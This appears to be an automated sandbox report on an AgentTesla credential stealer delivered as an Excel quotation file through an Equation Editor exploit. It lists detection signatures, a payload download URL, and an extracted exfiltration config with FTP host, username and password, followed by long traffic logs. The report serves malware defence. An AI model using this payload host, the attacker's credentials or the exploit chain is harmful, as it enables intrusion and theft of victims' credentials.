Windows Analysis Report
Quotation - Optical Eyeglasses.xlsx

Overview

General Information

Sample Name: Quotation - Optical Eyeglasses.xlsx
Analysis ID: 680486
MD5: 936a314411e4a93f2dd6a01b51216ef3
SHA1: 47483467b595bdd9a49b577f457d84bcdb3b1c3b
SHA256: 0897c1227e00e63196869de72f0e4436e8493a7ee095be94a914d4e547d6ac2e
Tags: xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Shellcode detected
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

AV Detection

Source: Quotation - Optical Eyeglasses.xlsx Virustotal: Detection: 35%
Source: Quotation - Optical Eyeglasses.xlsx ReversingLabs: Detection: 31%
Source: http://198.12.89.152/mon/mon.exehhC: Avira URL Cloud: Label: malware
Source: ftp://ftp.alonsorojasmudanzasnacionales.com/okok Avira URL Cloud: Label: malware
Source: http://198.12.89.152/mon/mon.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\Regasm_svchost.exe Joe Sandbox ML: detected
Source: 6.0.Regasm_svchost.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 6.0.Regasm_svchost.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.alonsorojasmudanzasnacionales.com/", "Username": "okok@alonsorojasmudanzasnacionales.com", "Password": "(gt)~^6!Sq6-"}

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.12.89.152 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05B6 ShellExecuteW,ExitProcess, 2_2_033F05B6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0517
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0588 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0588
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0531 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0531
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05A1 ShellExecuteW,ExitProcess, 2_2_033F05A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F045C ExitProcess, 2_2_033F045C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05DB ExitProcess, 2_2_033F05DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0491 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0491
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
